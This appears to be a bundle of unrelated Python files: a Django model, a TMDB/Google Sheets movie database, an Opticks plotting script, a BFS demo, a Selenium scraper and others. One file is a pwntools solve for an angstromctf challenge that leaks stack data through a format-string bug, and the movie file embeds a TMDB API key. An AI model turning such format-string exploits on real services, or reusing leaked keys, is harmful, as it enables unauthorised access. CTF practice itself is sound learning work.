    best_paths = [[r] for r in range(rows)]
    for col in range(1, cols):
        prev_smiles = best_smiles[:]
        prev_paths = best_paths[:]
        for row in range(rows):
            # feasible predecessors: row-1, row, row+1 clipped to the grid
            candidates = [p for p in range(row - 1, row + 2) if 0 <= p < rows]
            best_prev = max(candidates, key=lambda p: prev_smiles[p])
            best_smiles[row] = prev_smiles[best_prev] + smiles[row][col]
            best_paths[row] = prev_paths[best_prev] + [row]
    best_row = max(range(rows), key=lambda r: best_smiles[r])
    return best_paths[best_row]
|
from django.db import models
from django.contrib import admin
# Create your models here.
class MyPhoto(models.Model):
    """A photo upload with title, short comment and long description."""
    title = models.CharField(max_length=250)
    comment = models.TextField()
    detail_info = models.TextField()
    upload_time = models.DateField()
    photo = models.FileField(upload_to='photo')  # stored under MEDIA_ROOT/photo
class MyPhotoAdmin(admin.ModelAdmin):
    """Admin changelist configuration for MyPhoto."""
    list_display = ('upload_time', 'title', 'detail_info')


admin.site.register(MyPhoto, MyPhotoAdmin)
import httplib2
import os
import xlwt
import xlrd
import tmdbsimple as tmdb
from xlutils.copy import copy
from Movie import Movie, get_image
from apiclient import discovery
from oauth2client import client
from oauth2client import tools
from oauth2client.file import Storage
# Standard oauth2client boilerplate: parse CLI flags when argparse exists
# (taken from Google's Sheets API quickstart documentation).
try:
    import argparse
    flags = argparse.ArgumentParser(parents=[tools.argparser]).parse_args()
except ImportError:
    flags = None

# Flix with Friends special variables
# Creds stored at ~/.credentials/sheets.googleapis.flix-with-friends.json
SCOPES = 'https://www.googleapis.com/auth/spreadsheets'
CLIENT_SECRET_FILE = 'client_secret.json'
APPLICATION_NAME = 'Flix with Friends'
# SECURITY NOTE(review): TMDB API key hard-coded in source; move it to an
# environment variable or a config file kept out of version control.
tmdb.API_KEY = 'b299f0e8dce095f8ebcbae6ab789005c'
# GOOGLE_DOC_FILE = 'GoogleDocDB.xlsx'
GOOGLE_DOC_FILE = 'testing.xlsx'
class Database:
    """Movie database backed by a local Excel workbook, enriched via the
    TMDB API and optionally synced with a Google Sheet."""

    # NOTE(review): ``global`` statements at class scope are no-ops; these
    # names are only meaningful where they are actually assigned.
    global location
    global docID

    def __init__(self, FN = None):
        """FN: optional Excel filename; when given the DB is loaded at once."""
        self.fileName = ''  # NOTE(review): overwritten by FN two lines below
        self.dictionary = [] # cellular array of Excel file
        self.movies = [] # array of movies as class Movies
        self.fileName = FN
        self.listGenres = []  # sorted list of all genres seen
        self.MISSING_DATA = 'N/A'  # placeholder for absent TMDB fields
        self.spreadsheetID = ''
        self.oldest_year = 3000  # minimum release year across all movies
        self.friends = []  # distinct viewer names
        if FN is not None:
            self.loadDB()

    def loadDB(self):
        """Parse the Excel file into dicts and build Movie objects from them."""
        self.createDictionary()
        # Add Movies to movie list
        for movie in self.dictionary:
            self.addMovie(Movie(movie))
        self.listGenres = sorted(self.listGenres)

    def createDictionary(self):
        # This method converts all the data in the excelDB into a Listed PY dictionary
        # Access data by self.dictionary[row]['columnName']
        workbook = xlrd.open_workbook(self.fileName, on_demand=True)
        worksheet = workbook.sheet_by_index(0)
        first_row = [] # The row where we stock the name of the column
        for col in range(worksheet.ncols):
            first_row.append(worksheet.cell_value(0, col))
        # transform the workbook to a list of dictionaries
        for row in range(1, worksheet.nrows):
            elm = {}
            for col in range(worksheet.ncols):
                elm[first_row[col]] = worksheet.cell_value(row, col)
            self.dictionary.append(elm)

    def updateMovieDB(self, movie, row):
        # This method updates all columns of a single movie in the DB
        # (row is the 1-based sheet row to write into).
        rb = xlrd.open_workbook(self.fileName) # Open the excel file
        wb = copy(rb) # make a writeable copy of the open excel file
        w_sheet = wb.get_sheet(0) # read the first sheet to write to
        search = tmdb.Search() # Setup search to run API query
        response = search.movie(query = movie) # Search for movie
        i = 0
        for s in search.results: # for loop return first search result FIXME
            i = 1 + i
            if i == 1:
                titleID = s['id']
                daMovie = tmdb.Movies(titleID)
                response = daMovie.info()
                # Get Genres into one line
                genreResult = response['genres']
                gen = ''
                # NOTE(review): this inner loop reuses ``i``, clobbering the
                # outer result counter -- only works because the write block
                # below runs once; confirm before refactoring.
                for i in range(0, len(genreResult)):
                    gen += genreResult[i]['name']
                    if i < (len(genreResult) - 1):
                        gen += ', '
                # Write info to appropriate (row,column)
                w_sheet.write(row, 0, response['title'])
                w_sheet.write(row, 2, response['runtime'])
                if (gen is None) or (len(gen) == 0):
                    w_sheet.write(row, 3, 'N/A')
                else:
                    w_sheet.write(row, 3, gen)
                w_sheet.write(row, 4, response['release_date'])
                w_sheet.write(row, 5, response['vote_average'])
                w_sheet.write(row, 6, response['overview'])
                w_sheet.write(row, 7, titleID)
                if (response['poster_path'] is None) or (len(response['poster_path']) == 0):
                    w_sheet.write(row, 8, 'N/A')
                else:
                    w_sheet.write(row, 8, response['poster_path'])
        if i == 0: # If no search results
            print(movie, self.MISSING_DATA) # Print to console
            w_sheet.write(row, 2, self.MISSING_DATA) #runtime
            w_sheet.write(row, 3, self.MISSING_DATA) # genres
            w_sheet.write(row, 4, self.MISSING_DATA) # release date
            w_sheet.write(row, 5, '0') # vote count
            w_sheet.write(row, 6, self.MISSING_DATA) # overview
            w_sheet.write(row, 7, '0') # TMDB ID number
            w_sheet.write(row, 8, self.MISSING_DATA) # poster path
        wb.save(self.fileName) # Save DB edits

    def update(self):
        # Updates all movies' data in DB
        p = len(self.dictionary)
        # NOTE(review): the loop variable ``Movie`` shadows the imported class.
        for i, Movie in enumerate(self.dictionary):
            self.updateMovieDB(Movie['Title'], i + 1)
            # Display Percentage to console
            print('Percentage Complete: {0:.0f} %'.format(i / p * 100))
        print('Percentage Complete: 100 %')
        print('Database Update Complete')

    def addMovie(self, MOVIE):
        """Index a Movie: collect its genres and viewers, track the oldest year."""
        for g in MOVIE.genres:
            if g not in self.listGenres:
                if g != '' and g != self.MISSING_DATA:
                    (self.listGenres).append(g)
        # String comparison against str(oldest_year); works for 4-digit years
        # and the 'N/A' placeholder (which compares greater than digits).
        if MOVIE.release_date[:4] < str(self.oldest_year):
            self.oldest_year = int(MOVIE.release_date[:4])
        for v in MOVIE.viewers:
            if v not in self.friends:
                if v != '':
                    self.friends.append(v)
        self.movies.append(MOVIE)

    def newMovie(self, movie_title):
        # Add a new movie just with a movie title
        self.updateMovieDB(movie_title, len(self.movies) + 1)
        self.loadDB()

    # The following are functions if info is being pulled from a Google Sheet
    def get_credentials(self):
        """Gets valid user credentials from storage.

        If nothing has been stored, or if the stored credentials are invalid,
        the OAuth2 flow is completed to obtain the new credentials.

        Returns: Credentials, the obtained credential.
        """
        home_dir = os.path.expanduser('~')
        credential_dir = os.path.join(home_dir, '.credentials')
        if not os.path.exists(credential_dir):
            os.makedirs(credential_dir)
        credential_path = os.path.join(credential_dir,
                                       'sheets.googleapis.flix-with-friends.json')
        store = Storage(credential_path)
        credentials = store.get()
        if not credentials or credentials.invalid:
            flow = client.flow_from_clientsecrets(CLIENT_SECRET_FILE, SCOPES)
            flow.user_agent = APPLICATION_NAME
            if flags:
                credentials = tools.run_flow(flow, store, flags)
            else: # Needed only for compatibility with Python 2.6
                credentials = tools.run(flow, store)
            print('Storing credentials to ' + credential_path)
        return credentials

    def get_google_doc(self, sheetID):
        """Download the Google Sheet *sheetID* into GOOGLE_DOC_FILE and load it."""
        # Run Google OAuth2
        credentials = self.get_credentials()
        http = credentials.authorize(httplib2.Http())
        discoveryUrl = ('https://sheets.googleapis.com/$discovery/rest?'
                        'version=v4')
        service = discovery.build('sheets', 'v4', http=http,
                                  discoveryServiceUrl=discoveryUrl)
        # Pull data from the Google Sheet
        # self.spreadsheetID = '1OPg5wtyTFglYPGNYug4hDbHGGfo_yP9HOMRVjT29Lf8'
        docID = self.spreadsheetID = sheetID
        rangeName = 'Sheet1!A:I'
        result = service.spreadsheets().values().get(
            spreadsheetId=self.spreadsheetID, range=rangeName).execute()
        values = result.get('values', [])
        # Add values to the Excel sheet
        book = xlwt.Workbook(encoding="utf-8")
        sheet1 = book.add_sheet("Sheet 1")
        if not values:
            print('No data found.')
        else:
            i = 0
            # NOTE(review): assumes every returned row has exactly 9 cells;
            # short rows would raise IndexError.
            for row in values:
                sheet1.write(i, 0, row[0])
                sheet1.write(i, 1, row[1])
                sheet1.write(i, 2, row[2])
                sheet1.write(i, 3, row[3])
                sheet1.write(i, 4, row[4])
                sheet1.write(i, 5, row[5])
                sheet1.write(i, 6, row[6])
                sheet1.write(i, 7, row[7])
                sheet1.write(i, 8, row[8])
                i += 1
        book.save(GOOGLE_DOC_FILE)
        self.fileName = Database.location = GOOGLE_DOC_FILE
        self.loadDB()

    def upload_google_doc(self):
        """Push the local Excel workbook back up to the Google Sheet."""
        # Run Google OAuth2
        credentials = self.get_credentials()
        http = credentials.authorize(httplib2.Http())
        discoveryUrl = ('https://sheets.googleapis.com/$discovery/rest?'
                        'version=v4')
        service = discovery.build('sheets', 'v4', http=http,
                                  discoveryServiceUrl=discoveryUrl)
        # self.spreadsheetId = '1OPg5wtyTFglYPGNYug4hDbHGGfo_yP9HOMRVjT29Lf8'
        # Open the Excel sheet to read in data
        workbook = xlrd.open_workbook(self.fileName, on_demand=True)
        worksheet = workbook.sheet_by_index(0)
        # transform the workbook to a 2D list
        values = []
        for row in range(worksheet.nrows):
            elm = []
            for col in range(worksheet.ncols):
                elm.append(worksheet.cell_value(row, col))
            values.append(elm)
        # Upload values to the Google Sheet
        body = {
            'values': values
        }
        range_name = 'Sheet1!A1'
        result = service.spreadsheets().values().update(
            spreadsheetId=self.spreadsheetID, range=range_name,
            valueInputOption='USER_ENTERED', body=body).execute() # USER_ENTERED or RAW
if __name__ == "__main__":
    # Smoke test: pull the shared Google Sheet and list the movie titles.
    db = Database()
    doc_id = '1OPg5wtyTFglYPGNYug4hDbHGGfo_yP9HOMRVjT29Lf8'
    db.get_google_doc(doc_id)
    for movie in db.movies:
        print(movie.title)
    # db.newMovie('top gun')
    # db.update()
    # db.upload_google_doc()
|
#!/usr/bin/env python
#
# Copyright (c) 2019 Opticks Team. All Rights Reserved.
#
# This file is part of Opticks
# (see https://bitbucket.org/simoncblyth/opticks).
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
flightpath.py
==============
FlightPath not in active use, easier to directly create the eye-look-up array,
as done in mm0prim2.py and use quiver plots to debug the path.
"""
import numpy as np, logging, os
log = logging.getLogger(__name__)
from opticks.ana.view import View
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from matplotlib.patches import FancyArrowPatch
from mpl_toolkits.mplot3d import proj3d
class Arrow3D(FancyArrowPatch):
    """2D arrow patch whose endpoints are projected from 3D at draw time.

    NOTE(review): relies on ``proj3d.proj_transform`` and ``renderer.M``,
    which were removed/changed in recent matplotlib releases -- confirm the
    pinned matplotlib version.
    """

    def __init__(self, xs, ys, zs, *args, **kwargs):
        # Start with a dummy 2D arrow; real endpoints are set in draw().
        FancyArrowPatch.__init__(self, (0,0), (0,0), *args, **kwargs)
        self._verts3d = xs, ys, zs

    def draw(self, renderer):
        # Project the stored 3D endpoints with the current view matrix.
        xs3d, ys3d, zs3d = self._verts3d
        xs, ys, zs = proj3d.proj_transform(xs3d, ys3d, zs3d, renderer.M)
        self.set_positions((xs[0],ys[0]),(xs[1],ys[1]))
        FancyArrowPatch.draw(self, renderer)
class FlightPath(object):
    """In-memory list of Views that can be flattened to an (n,4,4) array.

    See optickscore/FlightPath.hh
    """
    FILENAME = "flightpath.npy"

    def __init__(self):
        self.views = []  # list of View objects, each exposing a 4x4 ``.v``

    def as_array(self):
        """Stack every view's 4x4 matrix into one (n,4,4) float32 array."""
        log.info(" views %s " % len(self.views) )
        a = np.zeros( (len(self.views), 4, 4), dtype=np.float32 )
        for i, v in enumerate(self.views):
            a[i] = v.v
        return a

    def save(self, dir_="/tmp"):
        """Write the flattened view array to <dir_>/flightpath.npy; return it."""
        path = os.path.join(dir_, self.FILENAME)
        # BUG FIX: the original called ``fp.as_array()``, which only worked
        # when a module-global ``fp`` happened to exist (and saved *its*
        # views, not this instance's); use ``self``.
        a = self.as_array()
        log.info("save %s to %s " % (repr(a.shape), path ))
        np.save(path, a )
        return a
if __name__ == '__main__':
    logging.basicConfig(level=logging.INFO)
    fp = FlightPath()
    dtype = np.float32
    # Fractional positions around one turn; drop the last sample so the
    # seam angle is not repeated.
    f = np.linspace(0, 1, 10, dtype=dtype)[:-1]  # skip last to avoid repeating seam angle
    t = f*2*np.pi
    n = len(f)
    # Eye positions: a helix (unit circle in x/y, rising in z from -1 to 1).
    eye = np.zeros( [n,3], dtype=dtype)
    eye[:,0] = np.cos(t)
    eye[:,1] = np.sin(t)
    eye[:,2] = 2*f-1
    # Each eye looks at the next eye position (wrapping at the end).
    look = np.zeros( [n,3], dtype=dtype )
    look[:-1] = eye[1:]
    look[-1] = eye[0]
    gaze = look - eye
    up = np.zeros( [n,3], dtype=dtype )
    up[:] = [0,0,1]  # world z is "up" for every frame
    # Pack eye/look/up into the first three rows of each 4x4 view matrix.
    v = np.zeros( (n,4,4), dtype=np.float32)
    v[:,0,:3] = eye
    v[:,1,:3] = look
    v[:,2,:3] = up
    np.save("/tmp/flightpath.npy", v )
    # Quick visual sanity check of the eye path.
    plt.ion()
    fig = plt.figure(figsize=(6,5.5))
    plt.title("flightpath")
    ax = fig.add_subplot(111, projection='3d')
    sz = 3
    ax.set_ylim([-sz,sz])
    ax.set_xlim([-sz,sz])
    ax.plot( eye[:,0], eye[:,1], eye[:,2] )
    fig.show()
    # Commented-out gaze-arrow rendering kept for debugging:
    """
    for i in range(n):
        a = Arrow3D([eye[i,0], gaze[i,0]],
                    [eye[i,1], gaze[i,1]],
                    [eye[i,2], gaze[i,2]], mutation_scale=20,
                    lw=3, arrowstyle="-|>", color="r")
        ax.add_artist(a)
    pass
    """
|
from django.conf.urls import patterns, url, include
# NOTE(review): ``django.conf.urls.patterns`` was deprecated in Django 1.8
# and removed in 1.10; this module only runs on old Django versions.
urlpatterns = patterns(
    '',
    url(r'^', include('client.urls_api', namespace='companies')),
)
|
# -*- coding: utf-8 -*-
'''
Created on Thu Jun 6 20:48:32 2019
@author: HP
'''
import math
class Node:
    """Graph vertex for BFS: key, distance, parent, colour and neighbours."""

    def __init__(self, key):
        self.k = key          # vertex label
        self.d = math.inf     # distance from the BFS source (inf = unvisited)
        self.parent = None    # predecessor in the BFS tree
        self.color = "white"  # white=unseen, gray=queued, black=finished
        self.adj = []         # adjacency list

    def insert(self, node):
        """Add *node* as a neighbour of this vertex."""
        self.adj.append(node)
# Adjacency-list description of an undirected graph ('f' is isolated).
g = { 'a' : ['c'], 'b' : ['c', 'e'], 'c' : ['a', 'b', 'd', 'e'], 'd' : ['c'], 'e' : ['c', 'b'], 'f' : [] }
# NOTE(review): ``list`` shadows the builtin of the same name.
list=[]
for key in g:
    new_node=Node(key)
    list.append(new_node)
# Wire up adjacency: letters map to node indices via ord() offsets,
# which assumes keys are consecutive lowercase letters starting at 'a'.
for i in list:
    val=i.k
    for j in g[val]:
        ind=ord(j)-ord('a')
        i.insert(list[ind])
open_list=[]
def BFS(s):
    """Breadth-first search from source node *s*.

    Sets ``d`` (hop distance from *s*), ``parent`` and ``color`` on every
    reachable node; unreachable nodes are left untouched.

    PERFORMANCE FIX: the original used a module-level list with
    ``open_list[0]`` / ``open_list.remove(node)``, both O(n) per step;
    a local deque gives O(1) pops and avoids leaking the queue globally.
    """
    from collections import deque
    queue = deque()
    queue.append(s)
    s.color = "gray"
    s.d = 0
    while queue:
        node = queue.popleft()
        for adj in node.adj:
            if adj.color == "white":
                adj.parent = node
                adj.d = node.d + 1
                queue.append(adj)
                adj.color = "gray"
        node.color = "black"
# Run BFS from the first node ('a') and print each vertex's distance;
# unreachable vertices (here 'f') keep the initial math.inf.
BFS(list[0])
for i in list:
    print(i.d)
|
def readFromFile(txtFile):
    """Count occurrences of each line (name) in *txtFile*.

    Prints the mapping (as before) and now also returns it so callers can
    use the counts -- backward compatible, since the original implicitly
    returned None which no caller could use.

    Note: splitting on '\\n' means a trailing newline contributes an empty
    string entry, matching the original behavior.
    """
    names = {}
    with open(txtFile, 'r') as open_file:
        for name in open_file.read().split('\n'):
            # dict.get collapses the original redundant if/elif membership tests
            names[name] = names.get(name, 0) + 1
    print(names)
    return names
if __name__ == "__main__":
    # input() already returns str; the str() wrapper is redundant but harmless.
    txtFile = str(input("Please enter the name of the text file: "))
    readFromFile(txtFile)
|
from tkinter import *
from interface import mainInterface
gris = '#333333'  # dark-grey background colour used by the main window
def lancement():
    """Open a fullscreen Tk window, build the main interface, and block in
    ``mainloop`` until the window is closed.

    ``mainInterface`` is the project-level UI builder imported at the top
    of the file; 'chasseur.png' is the asset it is given.
    """
    # The original's unused local ``x = 0.05`` has been removed.
    main = Tk()
    main.config(bg=gris)                   # module-level background colour
    main.attributes('-fullscreen', 1)      # borderless fullscreen
    mainInterface(main, 'chasseur.png')
    main.mainloop()
|
# -*- coding: utf-8 -*-
"""
Created on Mon Jul 22 09:37:45 2019
@author: tpc 02
"""
from selenium import webdriver
from selenium.common.exceptions import NoSuchElementException
import time
import os
def checarExiste(xpath):
    """Return True iff *xpath* matches an element on the current page.

    Relies on the module-level selenium ``driver``.
    """
    try:
        driver.find_element_by_xpath(xpath)
        return True
    except NoSuchElementException:
        return False
def _scrape_results_page():
    """Open every result link on the current search-results page and append
    its article text to ``file1``.

    Factored out: the original repeated this exact loop twice (first page
    and each "next" page).
    """
    lista = driver.find_elements_by_xpath('//*[@id="search-results"]/dl//dt/a')
    for aux in range(len(lista)):
        # Re-query the links each iteration: the DOM is rebuilt after the
        # back-navigation, so elements from ``lista`` would be stale.
        listaNova = driver.find_elements_by_xpath('//*[@id="search-results"]/dl//dt/a')
        listaNova[aux].click()
        texto = driver.find_element_by_xpath('//*[@id="content"]').text
        file1.write(texto + '\n \n')
        time.sleep(1)
        driver.execute_script("window.history.go(-1)")
        time.sleep(1)


os.chdir("C://Users//tpc 02//Desktop")
file1 = open("raspagemunirio4.txt","w")
chrome_path = "C://Users//tpc 02//Desktop//chromedriver.exe"
driver = webdriver.Chrome(chrome_path)

# Open the site and search for "CCET".
driver.get("http://www.unirio.br/")
time.sleep(0.5)
driver.find_element_by_xpath('//*[@id="searchGadget"]').click()
driver.find_element_by_xpath('//*[@id="searchGadget"]').send_keys("CCET")
driver.find_element_by_xpath('//*[@id="searchGadget_form"]/div/input[2]').click()

# Scrape the first results page, then follow "next" links until exhausted.
_scrape_results_page()
while checarExiste('//span[@class="next"]/a'):
    driver.find_element_by_xpath('//span[@class="next"]/a').click()
    time.sleep(1)
    _scrape_results_page()
file1.close()
from pwn import *
import time
import sys
def exploit():
    """Format-string leak: read a 64-bit stack value and answer the sum check.

    Relies on the module-level ``proc`` pwntools tube.
    """
    raw_input('wait')  # NOTE(review): Python-2 builtin (file mixes print()); pause, e.g. to attach a debugger
    # %9$018p prints the 9th stack argument as a zero-padded, 18-char pointer
    # ("0x" + 16 hex digits for amd64).
    buf = '%9$018p'
    proc.sendline(buf)
    proc.recvuntil('can you tell me their sum?\n')
    # Exactly 18 bytes of leaked pointer text, parsed as hex.
    guess = int(proc.recv(18), 16)
    print(guess >> 32)
    print(guess & 0x00000000ffffffff)
    # Presumably the binary asks for the sum of the value's two 32-bit
    # halves -- the answer sent back is exactly that.
    guess = (guess >> 32) + (guess & 0x00000000ffffffff)
    proc.sendline(str(guess))
if __name__ == '__main__':
    context.arch = 'amd64'
    # Connection string split into ['nc', host, port].
    connect = 'nc shell.angstromctf.com 1235'
    connect = connect.split(' ')
    if len(sys.argv) > 1:
        # Any extra CLI argument selects the remote CTF target.
        proc = remote(connect[1], int(connect[2]))
    else:
        # Otherwise run the challenge binary locally with its bundled libc.
        proc = process(['./guessPublic64'], env={'LD_LIBRARY_PATH': './'})
    exploit()
    proc.interactive()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Sep 24 13:49:41 2020
@author: thomas
"""
import os, sys
import pandas as pd
import time as t
import pathlib
#CONSTANTS
cwd_PYTHON = os.getcwd() + '/'  # run directory, trailing slash for plain string concatenation below
# Reynolds numbers to scan, kept as strings because they name the
# ../SweepRe/Re<value>/ directories verbatim.
ReList=['0.5','0.6','0.7','0.8','0.9','1.0','2.0','3.0','4.0','5.0','5.5','6.0','6.5','7.0','7.5',
        '10.0','12.5','15.0','17.5','20.0','25.0','30.0','35.0','40.0','50.0','60.0']
# constructs a filepath for the pos data of Re = $Re
# constructs a filepath for the pos data of Re = $Re
def pname(cwd):
    """Return the path of the position-data file inside directory *cwd*.

    (Dead commented-out variants from the original removed.)
    """
    return cwd + "/pd.txt"
def GetPosDataLength(cwd):
    """Number of dumps recorded in *cwd*'s position-data file.

    NOTE(review): the (rows - 1) / 2 arithmetic suggests two data rows per
    dump plus one extra row -- confirm against the file format.
    """
    frame = pd.read_csv(pname(cwd), delimiter=' ')
    n_rows = len(frame['time'])
    return int((n_rows - 1) / 2)
#Find missing VTK files for V-shape sims
print('Finding V-shape missing VTKs')
# ``with`` guarantees the report file is closed even if a read below raises
# (the original used a bare open()/close() pair).
with open(cwd_PYTHON + 'missingVTK.txt', 'w') as fp:
    for Re in ReList:
        cwd_Re = cwd_PYTHON + '../SweepRe/Re' + Re + '/'
        nDumps = GetPosDataLength(cwd_Re)
        cwd_DATA = cwd_Re + '/VTK/'
        missingVTK = []  # dump indices with no DATA%05d.vtk on disk
        for idx in range(nDumps):
            # Renamed from ``file`` to avoid shadowing the legacy builtin name.
            vtk_file = pathlib.Path(cwd_DATA + 'DATA%05d.vtk' % idx)
            if not vtk_file.exists():
                print("File %i does not exist" % idx)
                missingVTK.append(idx)
                fp.write('%i ' % idx)
        print('Missing VTK: Re = ' + Re)
        print(missingVTK)
        fp.write('\n')  # one report line per Reynolds number
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.